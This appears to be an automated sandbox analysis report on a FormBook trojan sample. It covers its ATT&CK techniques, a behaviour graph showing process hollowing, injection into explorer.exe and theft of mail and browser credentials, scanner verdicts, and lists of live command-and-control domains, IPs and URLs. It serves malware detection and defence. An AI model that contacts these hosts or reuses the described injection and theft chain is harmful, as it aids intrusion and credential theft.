          Valid Accounts1
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Obfuscated Files or Information          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
          Software Packing          		Security Account Manager16
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Virtualization/Sandbox Evasion          		NTDS141
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Access Token Manipulation          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common512
          Process Injection          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 830750 Sample: SecuriteInfo.com.Trojan.Gar... Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 3 other signatures 2->41 9 SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe 19 2->9         started        process3 file4 27 C:\Users\user\AppData\Local\...\vfpbkeeo.exe, PE32 9->27 dropped 12 vfpbkeeo.exe 1 9->12         started        process5 signatures6 55 Multi AV Scanner detection for dropped file 12->55 57 Detected unpacking (changes PE section rights) 12->57 59 Machine Learning detection for dropped file 12->59 61 2 other signatures 12->61 15 vfpbkeeo.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 20 explorer.exe 1 15->20 injected process9 dnsIp10 29 un-object.com 192.185.17.12, 49713, 49714, 80 UNIFIEDLAYER-AS-1US United States 20->29 31 www.222ambking.org 91.195.240.94, 49701, 49702, 80 SEDO-ASDE Germany 20->31 33 13 other IPs or domains 20->33 43 System process connects to network (likely due to code injection or exploit) 20->43 45 Performs DNS queries to domains with low reputation 20->45 24 cmd.exe 13 20->24         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 24->47 49 Tries to harvest and steal browser information (history, passwords, etc) 24->49 51 Modifies the context of a thread in another process (thread injection) 24->51 53 Maps a DLL or memory area into another process 24->53

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe42%ReversingLabsWin32.Trojan.FormBook
          SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe42%VirustotalBrowse
          SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe39%ReversingLabsWin32.Trojan.Lazy

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.vfpbkeeo.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.vfpbkeeo.exe.2080000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.bitservicesltd.com2%VirustotalBrowse
          www.younrock.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.energyservicestation.com/u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw==100%Avira URL Cloudmalware
          http://www.thedivinerudraksha.com/u2kb/1%VirustotalBrowse
          http://www.avisrezervee.com/u2kb/www.avisrezervee.com100%Avira URL Cloudmalware
          http://www.mygloballojistik.online0%Avira URL Cloudsafe
          http://www.thedivinerudraksha.com/u2kb/100%Avira URL Cloudmalware
          http://www.gritslab.com/u2kb/www.gritslab.com100%Avira URL Cloudmalware
          http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk100%Avira URL Cloudmalware
          http://www.germanreps.com0%Avira URL Cloudsafe
          http://www.shapshit.xyz0%Avira URL Cloudsafe
          http://www.ecomofietsen.com0%Avira URL Cloudsafe
          http://www.white-hat.uk/u2kb/www.white-hat.uk100%Avira URL Cloudmalware
          http://www.thedivinerudraksha.com0%Avira URL Cloudsafe
          http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7l100%Avira URL Cloudmalware
          http://www.bitservicesltd.com/u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ==100%Avira URL Cloudmalware
          http://www.thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg==100%Avira URL Cloudmalware
          http://www.energyservicestation.com/u2kb/www.energyservicestation.com100%Avira URL Cloudmalware
          http://www.un-object.com/u2kb/100%Avira URL Cloudmalware
          http://www.energyservicestation.com/u2kb/100%Avira URL Cloudmalware
          http://www.white-hat.uk0%Avira URL Cloudsafe
          http://www.dzyngiri.com0%Avira URL Cloudsafe
          http://www.employerseervices.com/u2kb/www.employerseervices.com0%Avira URL Cloudsafe
          http://www.younrock.com/u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R100%Avira URL Cloudmalware
          http://www.avisrezervee.com0%Avira URL Cloudsafe
          http://www.mygloballojistik.online/u2kb/0%Avira URL Cloudsafe
          http://www.bitservicesltd.com0%Avira URL Cloudsafe
          http://justinmezzell.com0%Avira URL Cloudsafe
          http://www.thewildphotographer.co.uk/u2kb/100%Avira URL Cloudmalware
          http://www.gritslab.com0%Avira URL Cloudsafe
          http://www.white-hat.uk/u2kb/100%Avira URL Cloudmalware
          https://alldomains.hosting/domain-registrieren.html0%Avira URL Cloudsafe
          http://www.bitservicesltd.com/u2kb/100%Avira URL Cloudmalware
          http://www.thewildphotographer.co.uk0%Avira URL Cloudsafe
          http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop100%Avira URL Cloudmalware
          http://www.222ambking.org/u2kb/www.222ambking.org100%Avira URL Cloudmalware
          http://www.gritslab.com/u2kb/100%Avira URL Cloudmalware
          http://www.employerseervices.com/u2kb/0%Avira URL Cloudsafe
          http://www.fclaimrewardccpointq.shop/u2kb/100%Avira URL Cloudmalware
          http://www.energyservicestation.com0%Avira URL Cloudsafe
          http://www.gritslab.com/u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R100%Avira URL Cloudmalware
          http://www.younrock.com0%Avira URL Cloudsafe
          https://alldomains.hosting/e-mail-server.html0%Avira URL Cloudsafe
          http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4c100%Avira URL Cloudmalware
          http://www.shapshit.xyz/u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R100%Avira URL Cloudmalware
          http://www.un-object.com/u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ==100%Avira URL Cloudmalware
          http://www.un-object.com/u2kb/www.un-object.com100%Avira URL Cloudmalware
          http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr100%Avira URL Cloudmalware
          http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com100%Avira URL Cloudmalware
          http://www.fclaimrewardccpointq.shop100%Avira URL Cloudmalware
          http://www.white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw==100%Avira URL Cloudmalware
          http://www.shapshit.xyz/u2kb/100%Avira URL Cloudmalware
          http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online0%Avira URL Cloudsafe
          https://alldomains.hosting/0%Avira URL Cloudsafe
          http://www.ecomofietsen.com/u2kb/100%Avira URL Cloudmalware
          http://www.avisrezervee.com/u2kb/100%Avira URL Cloudmalware
          https://alldomains.hosting/hosting-webhosting.html0%Avira URL Cloudsafe
          http://www.germanreps.com/u2kb/www.germanreps.com100%Avira URL Cloudmalware
          http://www.younrock.com/u2kb/www.younrock.com100%Avira URL Cloudmalware
          http://www.222ambking.org/u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R100%Avira URL Cloudmalware
          http://www.222ambking.org0%Avira URL Cloudsafe
          http://www.germanreps.com/u2kb/100%Avira URL Cloudmalware
          http://www.222ambking.org/u2kb/100%Avira URL Cloudmalware
          http://www.employerseervices.com0%Avira URL Cloudsafe
          http://www.shapshit.xyz/u2kb/www.shapshit.xyz100%Avira URL Cloudmalware
          http://www.un-object.com0%Avira URL Cloudsafe
          http://www.younrock.com/u2kb/100%Avira URL Cloudmalware
          http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com100%Avira URL Cloudmalware
          http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.bitservicesltd.com
          		161.97.163.8
          		truetrueunknown
          www.younrock.com
          		81.17.18.198
          		truetrueunknown
          www.energyservicestation.com
          		213.145.228.111
          		truetrue
            		unknown
            www.thewildphotographer.co.uk
            		45.33.30.197
            		truetrue
              		unknown
              www.shapshit.xyz
              		199.192.30.147
              		truetrue
                		unknown
                www.222ambking.org
                		91.195.240.94
                		truetrue
                  		unknown
                  thedivinerudraksha.com
                  		85.187.128.34
                  		truetrue
                    		unknown
                    un-object.com
                    		192.185.17.12
                    		truetrue
                      		unknown
                      white-hat.uk
                      		94.176.104.86
                      		truetrue
                        		unknown
                        gritslab.com
                        		78.141.192.145
                        		truetrue
                          		unknown
                          www.un-object.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.white-hat.uk
                            		unknown
                            		unknowntrue
                              		unknown
                              www.gritslab.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.thedivinerudraksha.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.fclaimrewardccpointq.shop
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.energyservicestation.com/u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.thedivinerudraksha.com/u2kb/true
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.bitservicesltd.com/u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.energyservicestation.com/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.un-object.com/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.younrock.com/u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3Rtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.thewildphotographer.co.uk/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.bitservicesltd.com/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.gritslab.com/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.gritslab.com/u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3Rtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.un-object.com/u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.shapshit.xyz/u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3Rtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw==true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.shapshit.xyz/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.222ambking.org/u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3Rtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.222ambking.org/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.younrock.com/u2kb/true
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabcmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drfalse
                                      		high
                                      http://www.avisrezervee.com/u2kb/www.avisrezervee.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://duckduckgo.com/ac/?q=HI4NJ046K.5.drfalse
                                        		high
                                        http://www.gritslab.com/u2kb/www.gritslab.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_ccmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://img.sedoparking.comexplorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://search.yahoo.com?fr=crmas_sfpfcmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drfalse
                                              		high
                                              http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.ukexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.mygloballojistik.onlineexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.shapshit.xyzexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.germanreps.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lexplorer.exe, 00000004.00000002.580448726.00000000158A6000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004A96000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.ecomofietsen.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.thedivinerudraksha.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.white-hat.uk/u2kb/www.white-hat.ukexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.energyservicestation.com/u2kb/www.energyservicestation.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.white-hat.ukexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.employerseervices.com/u2kb/www.employerseervices.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dzyngiri.comexplorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mygloballojistik.online/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.avisrezervee.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bitservicesltd.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://justinmezzell.comexplorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.white-hat.uk/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://alldomains.hosting/domain-registrieren.htmlexplorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.gritslab.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.thewildphotographer.co.ukexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shopexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.222ambking.org/u2kb/www.222ambking.orgexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.fclaimrewardccpointq.shop/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.327263504.0000000008260000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.name.com/domain/reneexplorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://www.energyservicestation.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icocmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drfalse
                                                    		high
                                                    http://www.employerseervices.com/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://alldomains.hosting/e-mail-server.htmlexplorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4ccmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.younrock.comexplorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HI4NJ046K.5.drfalse
                                                      		high
                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drfalse
                                                        		high
                                                        http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exefalse
                                                          		high
                                                          http://www.un-object.com/u2kb/www.un-object.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfrexplorer.exe, 00000004.00000002.580448726.0000000014C16000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000003E06000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.avisrezervee.com/u2kb/explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.mygloballojistik.online/u2kb/www.mygloballojistik.onlineexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drfalse
                                                            		high
                                                            http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.comexplorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
